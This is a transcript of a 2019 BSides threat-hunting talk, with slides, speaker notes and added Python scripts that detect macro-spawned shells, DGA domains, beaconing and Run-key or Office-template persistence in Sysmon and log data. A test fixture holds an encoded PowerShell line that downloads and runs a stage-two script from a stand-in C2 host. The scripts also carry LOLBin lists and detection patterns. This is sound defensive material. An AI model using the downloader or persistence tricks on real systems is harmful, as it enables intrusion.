Bsides 2019 - Intelligent Threat Hunting
1. Intelligent Threat Hunting
Dhruv Majumdar
Technical lead and Sr. Security Analyst of ElevatedPrompt Solutions
March 18, 2019 | Vancouver, BC
2. Agenda
▪ WHOAMI
▪ Threat Hunting Basics
▪ Threat Hunting Recipe
▪ Attack Life Cycle and few ways of detections
▪ Things to Look for
– Mitre ATT&CK
▪ Attack Scenario Walk-through
▪ Conclusion
3. whoami
▪ Dhruv Majumdar – Technical lead and Sr. Security Analyst for
ElevatedPrompt Solutions
▪ Career
▪ Hobbies
– Photography
– Breaking stuff
Disclaimer:
Please note that all opinions expressed are my own.
All content is owned by ElevatedPrompt Solutions
Inc and cannot be copied, distributed or repurposed
without prior consent
4. Threat Hunting Basics
WHAT DO WE DO ?
“PROACTIVELY & ITERATIVELY searching through the
environments to DETECT & ISOLATE threats that EVADE
EXISTING SECURITY SOLUTIONS”
5. Continued…
Traditional SOC
• Predominantly reactive and product driven
• Signature based and alert driven
Threat Hunting
• Proactive and team work
• Detect anomalies*
• F3EAD
7. Important Data sources
SIEM
Threat Intel (STIX / TAXII)
Network Data
– Bro
– Snort
– Moloch
– Proxy Logs
– Mail Server logs
Host Data
– Windows Event logs
– Sysmon
– GRR
– Auditd
– OSSEC
13. Attack Scenario Walk-through
Phishing / Office Macro
What data points do we need?
- Process execution data
- Enhanced PowerShell logging
- Email logs
Hunt hypothesis?
- Office programs launching VBA, PowerShell or cmd (look at the command-line arguments)
- Persistence mechanisms
- Unknown file hashes
What data sources are required?
- Sysmon
- Windows event logs
- Email logs
- (some form of network-based events?)
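The hypothesis above (Office programs launching VBA, PowerShell or cmd) can be tested directly against Sysmon Event ID 1 (process creation) records. The Python below is an added example written for this page, not the speaker's or ElevatedPrompt's tooling. The Sysmon field names (Image, ParentImage, CommandLine, ProcessGuid, ParentProcessGuid) are real; the sample events, the GUIDs and the c2.invalid URL are constructed for illustration. It walks the parent chain by ProcessGuid so that a WINWORD -> cmd -> powershell chain is attributed to Word even though PowerShell's direct parent is cmd, and it decodes an -EncodedCommand argument so the hunter sees the payload even where script block logging is not yet enabled.

```python
import base64
import ntpath
import re

# Office hosts that should never need a shell, and the LOLBins a macro typically spawns.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is base64(UTF-16LE).
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def image_name(path):
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, or None if there is none."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_office_spawns(events, max_depth=4):
    """Flag Event ID 1 records whose ancestry (up to max_depth hops) includes an Office app.

    Walking ParentProcessGuid rather than only ParentImage catches the
    WINWORD -> cmd -> powershell chain where PowerShell's direct parent is cmd.
    """
    by_guid = {e["ProcessGuid"]: e for e in events if e.get("EventID") == 1}
    hits = []
    for ev in by_guid.values():
        if image_name(ev["Image"]) not in SUSPICIOUS_CHILDREN:
            continue
        chain = [image_name(ev["Image"])]
        cur = ev
        for _ in range(max_depth):
            parent = by_guid.get(cur.get("ParentProcessGuid"))
            if parent is None:
                # Parent started before our log window: fall back to the ParentImage string.
                chain.append(image_name(cur["ParentImage"]))
                break
            chain.append(image_name(parent["Image"]))
            if chain[-1] in OFFICE_APPS:
                break
            cur = parent
        if any(name in OFFICE_APPS for name in chain[1:]):
            hits.append({
                "process": chain[0],
                "chain": " <- ".join(chain),
                "decoded": decode_encoded_command(ev["CommandLine"]),
            })
    return hits


# Constructed sample telemetry (not real Sysmon output): a macro in WINWORD spawns
# cmd, which spawns an encoded PowerShell downloader. GUIDs and URL are hypothetical.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "A", "ParentProcessGuid": "X",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": '"WINWORD.EXE" /n invoice.doc'},
    {"EventID": 1, "ProcessGuid": "B", "ParentProcessGuid": "A",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"cmd /c powershell -nop -w hidden -enc {ENCODED}"},
    {"EventID": 1, "ProcessGuid": "C", "ParentProcessGuid": "B",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell -nop -w hidden -enc {ENCODED}"},
    # Benign: an admin script launched from Explorer, no Office ancestor.
    {"EventID": 1, "ProcessGuid": "D", "ParentProcessGuid": "X",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell -File backup.ps1"},
]

if __name__ == "__main__":
    for hit in hunt_office_spawns(SAMPLE_EVENTS):
        print(hit["chain"], "|", hit["decoded"])
```

Two caveats when running this against real data: Sysmon's ProcessGuid is stable across a reboot while PID is not, which is why the chain is keyed on it; and a parent that exited before your log window starts will only be visible through the ParentImage string, which is why the fallback is kept. Any hit against a signed, whitelisted add-in should be triaged rather than dropped, because the same chain is what a legitimate macro-heavy workflow produces.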
15. Email URL Analysis
Screenshots: an email delivered to a shared mailbox loads a JavaScript file, which redirects to an ad network.
16. First analysis of the URL flagged it for further investigation…
Screenshots: the hosting directory was recently updated and contains a malicious XML document.
Feed the IOCs into your threat intelligence platform, then it is time to blog / present.
21. Conclusion
• Massive shortage of Cybersecurity Professionals
• Demand for experienced Threat Hunters
• Consider threat detection as a standalone function
How to get started?
SOF ELK - https://github.com/philhagen/sof-elk
Security Onion - https://github.com/Security-Onion-Solutions/security-onion
Hunting ELK - https://github.com/Cyb3rWard0g/HELK
@neondhruv
https://www.linkedin.com/in/neondhruv/
Editor's Notes
Things I want to cover in today's talk
What I do and a few personal traits, so that people can relate to me and come forward by the end of the talk to socialize.
What is Threat Hunting and why is it needed?
- The MITRE ATT&CK framework catalogues adversary techniques, which tells us what behaviours to look for.
The process always begins with a hypothesis and the working assumption that a breach has already happened.
From my perspective threat hunting is doing continuous DFIR of your environment.
Threat Hunting starts with people and uses technology to achieve the common goal.
What is F3EAD?
>> Find, Fix, Finish, Exploit, Analyze and Disseminate
Pentesters
Infrastructures
Web Applications
Security Researcher/ Consultant
Exploit Developer
Detection Evader
Reverse Engineers
RED team strategist/ Simulator
SOC Analyst
Incident Handler
Forensic Analyst | DFIR
HIDS
NIDS
Malware Analyst
Threat Intelligence
Log management solution (Hadoop, Apache Spark)
This gives us the edge over traditional AV, which is mostly signature based.
Important sources of data points needed to achieve a basic level of complete visibility in an environment.
Network data & host-based data
Network: Bro, Snort, Moloch, proxy logs, mail server logs
Host: Windows event logs, GRR, Sysmon, OSSEC, osquery, auditd.
Importance of host-based analysis
To detect persistence
Privilege escalation
Code execution
Exploits
Exfiltration of data
Importance of network-based data
C2
Payloads
Patterns
Lateral movement
Exfiltration of data
Threat Intelligence
STIX defines the structure in which the threat intel being generated can be shared.
TAXII defines the transport: the process by which that data is exchanged.
Active Defence: honeypots of various interaction levels, deployed in the environment to slow the attacker down and also to alert the SOC.
OSINT: leveraging Shodan, Pastebin and the dark web to gain tactical threat intelligence and build action items, or work on the action items as you find them.
The main motive of the blue team or the threat hunter is to contain the situation before the attacker reaches their objective,
and every time, turn the finding into a use case so that it is monitored going forward and added to your use case library.
Till now I was bringing you all up to speed.
Here I'll try to demonstrate how you can leverage all this intelligence together to protect your environment.
What you are looking at here is an HTTP beaconing pattern, which was more than enough to draw our attention and lead us to uncover the Conficker worm.
F-Secure did an excellent write-up on it.
Here is the finding after a deeper dive.
An instant giveaway that this is a worm that leverages a Domain Generation Algorithm (DGA) to talk back to its C2.
At this point you would want to extract the host and take a deeper dive, and also start interacting with other IT groups in the org to pull the plug on this box and do deeper analysis.
We matched the domains and confirmed this was the Conficker worm.
As a threat hunter you need an arsenal to help you fight the cause and detect what the anomaly is.
We leverage various methods to aid this cause; a few of these are Shannon entropy, JA3, beacon pattern analysis, URL extraction from emails and checking the entropy of the domains, etc.
Here is the example of DNS and HTTP entropy.
If you look closely here you will see a byte stream being passed over plain HTTP traffic, which we will be alerted on.
For the rest of this presentation I'd like to walk you through the kill chain process leveraging this example.
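Two of the methods named above, domain entropy and beacon pattern analysis, in Python as an added example for this page (not the speaker's tooling). Input is a list of (timestamp, source IP, destination host) tuples of the kind you would extract from DNS, proxy or Bro HTTP logs; the records below are constructed, not captured traffic. The 3.5-bit entropy threshold, the 0.2 jitter ratio and the six-request minimum are assumptions to be tuned against your own baseline.

```python
import math
from collections import Counter, defaultdict


def shannon_entropy(text):
    """Bits per character: 0.0 for a constant string, log2(len) when every character differs."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registered_label(fqdn):
    """The label left of the public suffix, approximated as the second-to-last label.

    Scoring this label rather than the full host name avoids flagging CDN and cloud
    host names that are random by design under a well-known domain. A real public
    suffix list would be needed for names like example.co.uk.
    """
    labels = fqdn.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def interval_stats(timestamps):
    """(median gap, coefficient of variation of the gaps) between requests, or None."""
    if len(timestamps) < 4:
        return None
    ts = sorted(timestamps)
    gaps = sorted(b - a for a, b in zip(ts, ts[1:]))
    median = gaps[len(gaps) // 2]
    mean = sum(gaps) / len(gaps)
    if mean == 0:
        return median, float("inf")
    stdev = math.sqrt(sum((g - mean) ** 2 for g in gaps) / len(gaps))
    return median, stdev / mean


def hunt_dns_http(records, entropy_threshold=3.5, cv_threshold=0.2, min_requests=6):
    """Two hunts over (timestamp, src_ip, dst_host) tuples from DNS or HTTP logs.

    1. DGA-like names: entropy of the registered label at or above entropy_threshold.
    2. Beacons: a src/dst pair with at least min_requests requests whose
       inter-request gaps are regular (coefficient of variation at or below cv_threshold).
       Using the CV tolerates the small jitter most implants add to their sleep.
    """
    findings = []
    by_pair = defaultdict(list)
    scored = set()
    for ts, src, dst in records:
        by_pair[(src, dst)].append(ts)
        if dst not in scored:
            scored.add(dst)
            h = shannon_entropy(registered_label(dst))
            if h >= entropy_threshold:
                findings.append({"type": "dga-like", "domain": dst, "entropy": round(h, 2)})
    for (src, dst), ts in by_pair.items():
        stats = interval_stats(ts)
        if len(ts) >= min_requests and stats and stats[1] <= cv_threshold:
            findings.append({"type": "beacon", "src": src, "dst": dst,
                             "period_s": stats[0], "jitter_cv": round(stats[1], 3)})
    return findings


# Constructed sample log (not real traffic): one host calling a random-looking
# domain every ~60 s with slight jitter, and one host browsing example.com irregularly.
SAMPLE_RECORDS = (
    [(1000 + 60 * i + j, "10.0.0.5", "pkzqvwrthmnbxcfy.info")
     for i, j in enumerate([0, 1, -1, 0, 2, 0, -1, 1])]
    + [(t, "10.0.0.7", "example.com") for t in (1000, 1003, 1090, 1091, 1400, 1405, 1900, 2500)]
)

if __name__ == "__main__":
    for finding in hunt_dns_http(SAMPLE_RECORDS):
        print(finding)
```

Entropy alone is a weak signal: a label of n distinct characters cannot exceed log2(n) bits, so short DGA names never reach the threshold, and some legitimate names (hashed tracking hosts, certain CDNs) do. Pair it with NXDOMAIN rate per host and first-seen age, as the Conficker case above shows, and treat the beacon hunt the same way: a regular period is also what software update checks and monitoring agents produce, so the destination still has to be triaged.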
So this is an example of a phishing email with an attachment.
>>
2 alerts generated:
Auto Open Macro – when the malicious email is received.
Alert Terse Name – 2nd Stage payload – when the macro has been downloaded and executed.
From our host-based data we can also see that the following tasks occurred:
File created
Run keys set as a persistence mechanism
So the WinWord process calls cmd, which then calls PowerShell.
We get all this data by leveraging Sysmon.
Run keys: Run keys and services are registry entries; they are a way to execute a program automatically every time a user logs in (Run keys) or the system boots (services).
More modern malware leverages:
Office templates: MS Office templates are part of the common Office applications and are used to customize styles, so the base template is loaded each time an application starts.
A .dotm template can be created or modified to include a malicious macro. Excel actually doesn't have a startup template by default, but one can be created and added that will be automatically loaded.
DLL: a malware DLL can be made persistent on a Windows host simply by residing in a specific directory with a specific name, with no evidence in the registry or Startup folder and no modified system binaries.
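A check for the first two persistence mechanisms described above (Run keys and Office startup templates), in Python as an added example for this page; this is not the speaker's code, and the Sysmon events below are constructed. It uses Sysmon Event ID 13 (registry value set) and Event ID 11 (file create) with their real field names (TargetObject, Details, TargetFilename, Image). The DLL search-order technique needs module-load telemetry (Event ID 7) and a per-application baseline, so it is deliberately not covered here.

```python
import ntpath
import re

# Registry autostart locations under HKLM or HKU/HKCU.
RUN_KEY_RE = re.compile(r"(?i)\\CurrentVersion\\(Run|RunOnce|RunServices)\\")
# Directories a non-admin user (and therefore a macro) can write to.
USER_WRITABLE_RE = re.compile(r"(?i)\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\")
# Office locations that are loaded automatically at application start.
TEMPLATE_DIR_RE = re.compile(r"(?i)\\Microsoft\\(Templates|Word\\STARTUP|Excel\\XLSTART|AddIns)\\")
MACRO_EXT = {".dotm", ".docm", ".xlam", ".xla", ".xlsm", ".xlsb", ".xltm"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def hunt_persistence(events):
    """Return one finding per Run-key write or macro-capable file dropped into an Office autoload path."""
    findings = []
    for ev in events:
        writer = ntpath.basename(ev.get("Image", "")).lower()
        if ev["EventID"] == 13 and RUN_KEY_RE.search(ev["TargetObject"]):
            value = ev.get("Details", "")
            # A Run value pointing into a user-writable directory, or written by a
            # script host / Office app, is the pattern from the macro walkthrough.
            suspicious = bool(USER_WRITABLE_RE.search(value)) or writer in OFFICE_APPS | SCRIPT_HOSTS
            findings.append({"technique": "registry-run-key",
                             "severity": "high" if suspicious else "low",
                             "key": ev["TargetObject"], "value": value, "by": writer})
        elif ev["EventID"] == 11:
            path = ev["TargetFilename"]
            ext = ntpath.splitext(path)[1].lower()
            if TEMPLATE_DIR_RE.search(path) and ext in MACRO_EXT:
                # Word rewriting Normal.dotm on exit is routine; anything else dropping a
                # macro-capable file into a startup/template folder is not.
                routine = writer in OFFICE_APPS and ntpath.basename(path).lower() == "normal.dotm"
                findings.append({"technique": "office-template",
                                 "severity": "low" if routine else "high",
                                 "path": path, "by": writer})
    return findings


# Constructed sample events (not real Sysmon output); SID, paths and names are hypothetical.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "Details": r"C:\Users\alice\AppData\Roaming\svchost.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r'"C:\Program Files\Vendor\tray.exe"'},
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Templates\Normal.dotm"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Word\STARTUP\inv.dotm"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Excel\XLSTART\book.xlam"},
    {"EventID": 11, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\report.pdf"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for finding in hunt_persistence(SAMPLE_EVENTS):
        print(finding)
```

Sysmon only emits Event ID 13 for registry paths that your configuration includes, so confirm the Run/RunOnce keys are in the RegistryEvent filter before trusting a quiet result. The "low" severity is kept rather than dropped so that a vendor installer writing a Run value still lands in the use-case review the notes above describe.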
In this case we are dealing with Emotet, and only with credential stealing.
But this might very well be an ngRAT and lead to lateral movement.